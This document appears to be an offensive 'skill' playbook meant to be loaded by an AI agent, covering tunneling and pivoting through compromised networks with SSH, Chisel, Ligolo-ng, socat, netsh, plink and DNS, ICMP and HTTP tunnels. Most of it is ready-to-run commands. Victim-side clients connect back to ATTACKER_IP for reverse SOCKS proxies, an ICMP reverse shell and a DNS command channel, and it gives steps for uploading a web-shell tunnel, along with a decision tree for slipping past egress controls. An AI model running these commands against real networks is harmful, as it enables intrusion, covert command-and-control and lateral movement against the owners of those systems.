SKILL: Tunneling & Pivoting — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
0. RELATED ROUTING
Before going deep, consider loading:
- network-protocol-attacks for network-level attacks from pivot positions
- reverse-shell-techniques for establishing initial access shells
- unauthorized-access-common-services for exploiting services discovered through pivots
- linux-privilege-escalation or windows-privilege-escalation after pivoting to new hosts
1. SSH TUNNELING
Local Port Forward
Forward a local port to a remote service through the pivot.
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N
# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080
# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
Remote Port Forward
Expose a local service to the pivot host's network.
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N
# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
Dynamic Port Forward (SOCKS Proxy)
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24
# Or with browser SOCKS proxy → browse internal web apps
Jump Host (ProxyJump)
# Single jump
ssh -J jumphost user@TARGET
# Multiple jumps
ssh -J jump1,jump2 user@TARGET
# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
HostName 10.10.10.100
User admin
ProxyJump user@jumphost.example.com
2. CHISEL
Reverse SOCKS Proxy (Most Common)
# Attacker: start chisel server
chisel server --reverse --port 8080
# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks
# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
Port Forwarding
# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
# Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444
3. LIGOLO-NG
TUN interface-based pivoting — transparent routing without SOCKS.
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo-proxy console:
>> session # select agent session
>> ifconfig # view agent's network interfaces
>> start # start tunnel
# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
Listener (Reverse Shell Catcher Through Pivot)
# In ligolo-proxy console:
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
Double Pivot
# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2
4. SOCAT
# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80
# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file
5. PROXYCHAINS / PROXIFIER
ProxyChains Configuration
# /etc/proxychains4.conf
strict_chain # fail if any proxy is down
# dynamic_chain # skip dead proxies
# random_chain # randomize proxy order
[ProxyList]
socks5 127.0.0.1 1080 # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081 # second hop (if chaining)
# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
6. WINDOWS PIVOTING
Netsh Port Forwarding
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
:: List forwards
netsh interface portproxy show all
:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Plink (PuTTY CLI)
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER
:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER
:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER
7. DNS TUNNELING
# iodine — IP-over-DNS
# Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
# Client (victim):
iodine -f -P password t1.yourdomain.com
# Creates dns0 interface → route traffic through it
# dnscat2 — command channel over DNS
# Server:
ruby dnscat2.rb yourdomain.com
# Client:
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET
8. ICMP TUNNELING
# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
# Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
# Victim (Windows):
icmpsh.exe -t ATTACKER_IP
# ptunnel-ng — TCP-over-ICMP
# Server:
ptunnel-ng -r INTERNAL_HOST -R 22
# Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22
ssh -p 2222 user@127.0.0.1
9. HTTP TUNNELING
# Neo-reGeorg — SOCKS proxy via web shell
# Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
# Upload tunnel.php/aspx/jsp to target web server
# Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
# SOCKS proxy on 127.0.0.1:1080
# Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP
10. PIVOTING DECISION MATRIX
| Egress Allowed | Tool | Notes |
|---|---|---|
| TCP outbound (any port) | Chisel, Ligolo-ng, SSH | Fastest setup |
| TCP 80/443 only | Chisel (HTTP/S), Neo-reGeorg | Blend with web traffic |
| DNS only (53/udp) | iodine, dnscat2 | Slow but stealthy |
| ICMP only | ptunnel-ng, icmpsh | Very restricted environments |
| No outbound | Bind shell + port forward in | Needs inbound access to pivot |
| Web shell only | Neo-reGeorg, Tunna | When only HTTP file upload works |
11. DECISION TREE
Compromised host — need to reach internal network
│
├── Can install tools on pivot?
│ ├── YES + outbound TCP allowed?
│ │ ├── Need transparent routing? → Ligolo-ng (§3)
│ │ ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│ │ └── SSH available? → SSH dynamic forward (§1)
│ │
│ ├── YES + only HTTP(S) outbound?
│ │ ├── Chisel over HTTPS (§2)
│ │ └── Upload web tunnel → Neo-reGeorg (§9)
│ │
│ ├── YES + only DNS outbound?
│ │ └── iodine or dnscat2 (§7)
│ │
│ └── YES + only ICMP allowed?
│ └── ptunnel-ng or icmpsh (§8)
│
├── Cannot install tools (web shell only)?
│ └── Neo-reGeorg / Tunna via web shell (§9)
│
├── Windows pivot?
│ ├── Admin access? → netsh portproxy (§6)
│ ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│ └── Outbound SSH? → plink (§6)
│
├── Need multi-layer pivot?
│ ├── Ligolo-ng: multiple agents + route stacking (§3)
│ ├── SSH ProxyJump chaining (§1)
│ └── ProxyChains with multiple SOCKS (§5)
│
└── Teammate needs access too?
├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
└── Share Ligolo-ng routes via common proxy